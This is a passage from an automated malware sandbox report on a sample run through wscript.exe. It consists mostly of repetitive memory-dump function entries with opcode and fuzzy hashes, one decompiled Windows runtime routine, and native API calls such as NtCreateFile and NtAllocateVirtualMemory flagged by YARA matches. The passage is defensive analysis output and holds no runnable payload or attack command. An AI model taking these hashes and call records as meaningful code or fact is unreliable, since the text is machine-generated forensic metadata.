                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d53939ce73aa94a7938cf9eb53b4a527f6b23f7af1e3fcbf8dcafb185136d9c
                                                                        • Instruction ID: 637196c8af5cf0e28a20c94d851b2fb3cab9665844dd1364bdefb5789e969f16
                                                                        • Opcode Fuzzy Hash: 1d53939ce73aa94a7938cf9eb53b4a527f6b23f7af1e3fcbf8dcafb185136d9c
                                                                        • Instruction Fuzzy Hash: 1A90026120158842E140A2594804B0F41459BE1642F95C019A4147558CCA5588556761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969A10, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fbe512d9f55ec954da5332818a6b298643dcbf731d8718c0cffcb115140b89d8
                                                                        • Instruction ID: 136c5498b8d1a38d9ab032654e34bcb3d2c96848450d553c0fc1293b2e6919ba
                                                                        • Opcode Fuzzy Hash: fbe512d9f55ec954da5332818a6b298643dcbf731d8718c0cffcb115140b89d8
                                                                        • Instruction Fuzzy Hash: C990027120154802E100A159480874700459BD0742F55C011A5155559E87A5C8917571
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 039699D0, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e83e1ea7c96312dc2512a2e9fd85131c235a0e66c2baa18a777a3087efd21f2c
                                                                        • Instruction ID: 6a11d5abd3f48205353a641790aa3f7965d80110af181429608de660e14eba1b
                                                                        • Opcode Fuzzy Hash: e83e1ea7c96312dc2512a2e9fd85131c235a0e66c2baa18a777a3087efd21f2c
                                                                        • Instruction Fuzzy Hash: BB9002A121114442E104A159440470600859BE1641F55C012A2145558CC6698C616165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969950, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d5710d4c168dca3a896dbf4d8d13cd31305218d7560fcb90c1e9ddda5cfd963a
                                                                        • Instruction ID: 2d29e5fc5ac0b877fad4fb0d47e22b385bf41ae288dba99bbd9c5cdb42ee282c
                                                                        • Opcode Fuzzy Hash: d5710d4c168dca3a896dbf4d8d13cd31305218d7560fcb90c1e9ddda5cfd963a
                                                                        • Instruction Fuzzy Hash: BB9002A120154803E140A559480460700459BD0742F55C011A2055559E8B698C517175
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 039698A0, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af43f8298fbb7d9d5a9d459505a90d08ce1b3bab1d79c0387566e023b787bde9
                                                                        • Instruction ID: 2f38cae99ef20eb4e14033178b8b3ea2a29dfc50adba13f1549811ec4df006ca
                                                                        • Opcode Fuzzy Hash: af43f8298fbb7d9d5a9d459505a90d08ce1b3bab1d79c0387566e023b787bde9
                                                                        • Instruction Fuzzy Hash: 0F90026130114802E102A15944146060049DBD1785F95C012E1415559D87658953B172
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969820, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2b6341e74ca2323b7537196165cdbd39c272c74948b36a2d7a7a3672ef42346b
                                                                        • Instruction ID: c0c6afcbec02bf53ff7372fa1c8fb25914603b185c46ddbbc182e169c0ee5fbc
                                                                        • Opcode Fuzzy Hash: 2b6341e74ca2323b7537196165cdbd39c272c74948b36a2d7a7a3672ef42346b
                                                                        • Instruction Fuzzy Hash: 1290027124114802E141B15944046060049ABD0681F95C012A0415558E87958A56BAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0396B040, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4679f06408e1749dc311d1a30fc20168e37427a0c7aeb75d218c9753e7f29150
                                                                        • Instruction ID: e00bd170008765403f5fe0f1e1c9167919c30fff4593a3060f2c2e3dd655eef1
                                                                        • Opcode Fuzzy Hash: 4679f06408e1749dc311d1a30fc20168e37427a0c7aeb75d218c9753e7f29150
                                                                        • Instruction Fuzzy Hash: CD9002A1601284435540F15948044065055ABE1741395C121A0445564C87A88855A2A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0396A710, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c91f52fb24556d653597ef05b02c587b836f7559f01d43576544a3bb3d97660
                                                                        • Instruction ID: 8bad915695a50d081c59aa64ed1febf1c2a02efd2530f1eeae16535c482956cb
                                                                        • Opcode Fuzzy Hash: 7c91f52fb24556d653597ef05b02c587b836f7559f01d43576544a3bb3d97660
                                                                        • Instruction Fuzzy Hash: 6A90027130114452A500E6995804A4A41459BF0741B55D015A4005558C869488616161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969730, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4e4bf7a11cb8b54cb1afd279b96ece4d911d0a0e9b76a0b7a03511da7c90d9e
                                                                        • Instruction ID: 9f5c89698fc89826c9fee84e91529962bdb671f2a85dd3a5557a5cb31ae60069
                                                                        • Opcode Fuzzy Hash: a4e4bf7a11cb8b54cb1afd279b96ece4d911d0a0e9b76a0b7a03511da7c90d9e
                                                                        • Instruction Fuzzy Hash: 5C90026160514802E140B159541870600559BD0641F55D011A0015558DC7998A5576E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969770, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3b8ae7f94985a99ae788bee1878060ed40edcac215e61ade2eac48453d53477
                                                                        • Instruction ID: 379ec2714cea0b26ae73d5c71cb61d04d815b57d019eadb4fbc99525641c3882
                                                                        • Opcode Fuzzy Hash: a3b8ae7f94985a99ae788bee1878060ed40edcac215e61ade2eac48453d53477
                                                                        • Instruction Fuzzy Hash: 4090026120518842E100A5595408A0600459BD0645F55D011A1055599DC7758851B171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0396A770, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7717a22aa61ea10141bdcf83e584c3ecab6aa3576260fbfb2881ef8d35efea08
                                                                        • Instruction ID: 49c157856c26f984f2d7576ac8666854e8464e55beee8f4f870eb8e946ac238b
                                                                        • Opcode Fuzzy Hash: 7717a22aa61ea10141bdcf83e584c3ecab6aa3576260fbfb2881ef8d35efea08
                                                                        • Instruction Fuzzy Hash: 0190027520518842E500A5595804A8700459BD0745F55D411A041559CD87948861B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969760, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2edbb99074eb1d827023ddc6b32ff0de55ddea3641dc45c8bbacf35f44230e0a
                                                                        • Instruction ID: 652aa14433173fb68629ec20efa33bf9ab79c4ee750b2a116046fafe961308d4
                                                                        • Opcode Fuzzy Hash: 2edbb99074eb1d827023ddc6b32ff0de55ddea3641dc45c8bbacf35f44230e0a
                                                                        • Instruction Fuzzy Hash: D990047130114C03F100F15D550C7070045DFD0741F55D411F041555CDD7D7CC517171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 039696D0, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6027c519841b305510332cf2f0d1038429ea75c4c0045daac62a997cd746bfd1
                                                                        • Instruction ID: 6b6781b91bc6dd3432dccc58a70b48dacc44dd047409efab9f2696af2cb834b4
                                                                        • Opcode Fuzzy Hash: 6027c519841b305510332cf2f0d1038429ea75c4c0045daac62a997cd746bfd1
                                                                        • Instruction Fuzzy Hash: B690027120114C42E100A1594404B4600459BE0741F55C016A0115658D8755C8517561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969610, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5238728e7cacdcea9eebb116e078f0436fb20119a9f6a059aafe9a88704cf684
                                                                        • Instruction ID: f3ab45de6fafde4227c4e3bddff3d813e3dc9f1ef7d3c55847919def28e3e5a1
                                                                        • Opcode Fuzzy Hash: 5238728e7cacdcea9eebb116e078f0436fb20119a9f6a059aafe9a88704cf684
                                                                        • Instruction Fuzzy Hash: 9F90027160514C02E150B159441474600459BD0741F55C011A0015658D87958A5576E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969650, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 364fa4383636e45811178b8355cb85b4fc09bbc1a09ae72d8728a6f1022bcff2
                                                                        • Instruction ID: 8c2e4bc43b2f4c13a4845710d7ab13d100a2eab06d272934d5d22961f21c8470
                                                                        • Opcode Fuzzy Hash: 364fa4383636e45811178b8355cb85b4fc09bbc1a09ae72d8728a6f1022bcff2
                                                                        • Instruction Fuzzy Hash: C090027120518C42E140B1594404A4600559BD0745F55C011A0055698D97658D55B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 039695F0, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bc4b9b5566eb98a67f5cf53b690430cf51b46213085127d2fb988b10ead51b95
                                                                        • Instruction ID: e931f4d1a8b09bd0e919da9625256847439cf55c0a9c9a0e3731d6c3e9a2b674
                                                                        • Opcode Fuzzy Hash: bc4b9b5566eb98a67f5cf53b690430cf51b46213085127d2fb988b10ead51b95
                                                                        • Instruction Fuzzy Hash: D090027120114C02E104A159480468600459BD0741F55C011A6015659E97A588917171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0396AD30, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 97a0b2251db77544e55d3c0badd5aa66ab8594da76614621afecd88626a20d27
                                                                        • Instruction ID: 96acdb5ca87e2c2ab96d23594f372d83d78710719dd561ca7a0402b0863dce7b
                                                                        • Opcode Fuzzy Hash: 97a0b2251db77544e55d3c0badd5aa66ab8594da76614621afecd88626a20d27
                                                                        • Instruction Fuzzy Hash: 3D900271A0514412A140B15948146464046ABE0B81B59C011A0505558C8A948A5563E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969520, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d329c49b0f84dc6bb337bb798cf10da90b8e4837820bac7c190279dbcebcf05e
                                                                        • Instruction ID: 59b983c4b2f0b841b94fddceac5fd7b4dfcde636ddd8020c215498ac65443fe1
                                                                        • Opcode Fuzzy Hash: d329c49b0f84dc6bb337bb798cf10da90b8e4837820bac7c190279dbcebcf05e
                                                                        • Instruction Fuzzy Hash: DC9002E1201284925500E2598404B0A45459BE0641B55C016E1045564CC6658851A175
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969560, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d89536c2ea37f6a65a64cb0417be1aeeb58ef53d933a4dd5f57ed0456e39cb95
                                                                        • Instruction ID: 5be161f689c4c97c7dca16b2b66d4831ef61b8a443e8ae98123c51f9eb392964
                                                                        • Opcode Fuzzy Hash: d89536c2ea37f6a65a64cb0417be1aeeb58ef53d933a4dd5f57ed0456e39cb95
                                                                        • Instruction Fuzzy Hash: 56900265221144021145E559060450B0485ABD6791395C015F1407594CC76188656361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969670, Relevance: .0, Instructions: 2COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: 72da9751f39bf5ef4294f02ca5d446bd00af85908dd1f4ab67f9f9eb6e4fca30
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 039BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E039BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0396CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E039B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E039B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                        0x039bfdda
                                                                        0x039bfde2
                                                                        0x039bfde5
                                                                        0x039bfdec
                                                                        0x039bfdfa
                                                                        0x039bfdff
                                                                        0x039bfe0a
                                                                        0x039bfe0f
                                                                        0x039bfe17
                                                                        0x039bfe1e
                                                                        0x039bfe19
                                                                        0x039bfe19
                                                                        0x039bfe19
                                                                        0x039bfe20
                                                                        0x039bfe21
                                                                        0x039bfe22
                                                                        0x039bfe25
                                                                        0x039bfe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 039BFDFA
                                                                        Strings
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039BFE2B
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039BFE01
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 4675666a090f5f9479214b10e963286fc72762707615f536c982c14f9bb2de04
                                                                        • Instruction ID: 6856ba4325b5a988181305992dcaabd894b81289bfb9b1a3bbf21ff851475307
                                                                        • Opcode Fuzzy Hash: 4675666a090f5f9479214b10e963286fc72762707615f536c982c14f9bb2de04
                                                                        • Instruction Fuzzy Hash: C8F0C236240201BFDA219A89DD02E67BB6AEB85770F150214F6685A1D1DA62B83086A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Analysis Process: wscript.exe PID: 6712 Parent PID: 3472 wscript.exeCOMMON

                                                                        Executed Functions

                                                                        Function 006282EA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(0=b,?,?,00623D30,00000000,FFFFFFFF), ref: 00628315
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID: 0=b$];b
                                                                        • API String ID: 3535843008-3122864308
                                                                        • Opcode ID: 3143c59466556592eb98aba46643c6d922b395ceb151f34d36385954ee54d7f4
                                                                        • Instruction ID: 8b8ffe42f74c9fa03d1b4db22f10c44f360952c3a69a867dbba2d21ef1158640
                                                                        • Opcode Fuzzy Hash: 3143c59466556592eb98aba46643c6d922b395ceb151f34d36385954ee54d7f4
                                                                        • Instruction Fuzzy Hash: 7DF0FF752016247FD714EF98DC89ED777A9EF48750F158899FA1C5B292DA30FA008AE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006281BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00623B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00623B97,007A002E,00000000,00000060,00000000,00000000), ref: 0062820D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: d1406c367c3966fcfff6a4a5ce4105cd283d0cc049c22259a514cbaad3e75b7c
                                                                        • Instruction ID: adbabd8bbb9dee9087cd413a44d8a1d5673128d80319c8dc207d14e4ec421ae1
                                                                        • Opcode Fuzzy Hash: d1406c367c3966fcfff6a4a5ce4105cd283d0cc049c22259a514cbaad3e75b7c
                                                                        • Instruction Fuzzy Hash: 8901B2B2201148AFDB48CF98DC94EEB77A9AF8C754F158648FA0D97281C630EC11CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006281C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00623B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00623B97,007A002E,00000000,00000060,00000000,00000000), ref: 0062820D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction ID: 38f1cf4ed44bfde3711778ce4789ec2b761eee6327883547eebfcf9dc38acbf1
                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction Fuzzy Hash: B4F0B6B2201108AFCB48CF88DC85DEB77ADAF8C754F158648FA0D97241C630E8118BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006282F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(0=b,?,?,00623D30,00000000,FFFFFFFF), ref: 00628315
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID: 0=b
                                                                        • API String ID: 3535843008-310277192
                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction ID: fe9bce4a573c2e43881b5c2319c0c259093f126564660dbab9c2e58c590c1a2e
                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction Fuzzy Hash: D3D012752002146BD710EF98DC45E97775DEF44750F154459BA185B282C930F90086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00628270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,00623A11,?,?,?,?,00623A11,FFFFFFFF,?,R=b,?,00000000), ref: 006282B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction ID: 40b1261690b6dc9bde5d79caa465777422ef5dba1f40b8b8b89e8759dc7540f3
                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction Fuzzy Hash: 8BF0A4B2200208AFCB14DF89DC81EEB77ADAF8C754F158648BA1D97241DA30E8118BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0062839B, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00612D11,00002000,00003000,00000004), ref: 006283D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 276487de27036f447431db30dbe3768bd69423c6ef43ef343d85c74857be37cb
                                                                        • Instruction ID: c64c6f8029bb8eefe23cb8906d91dffb21bd8dc29408eaa6358da2cd89eecf3c
                                                                        • Opcode Fuzzy Hash: 276487de27036f447431db30dbe3768bd69423c6ef43ef343d85c74857be37cb
                                                                        • Instruction Fuzzy Hash: 27F0FE71200118ABCB14DF89DC81EE777A9EF88350F118559FE5997241C630E915CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006283A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00612D11,00002000,00003000,00000004), ref: 006283D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction ID: 1306b8c495f1aa9dc0e3315e7f48d4a6df0384c1655b44a61734f8cae5edbede
                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction Fuzzy Hash: D7F015B2200218AFCB14DF89DC81EAB77ADAF88750F118548FE0897281CA30F810CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 91b47f8a9aaad9f4ab6454e7c137e7b923ddd427f6217aebff60f650fa631a57
                                                                        • Instruction ID: 4a55a5350cec07fcc5f15b7fa3b6fae7ec5631b62d0380ea2229e667a55bddb6
                                                                        • Opcode Fuzzy Hash: 91b47f8a9aaad9f4ab6454e7c137e7b923ddd427f6217aebff60f650fa631a57
                                                                        • Instruction Fuzzy Hash: 92900261242041677586B15944145474046E7E0285791C522A2909A70CC566F85AE6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
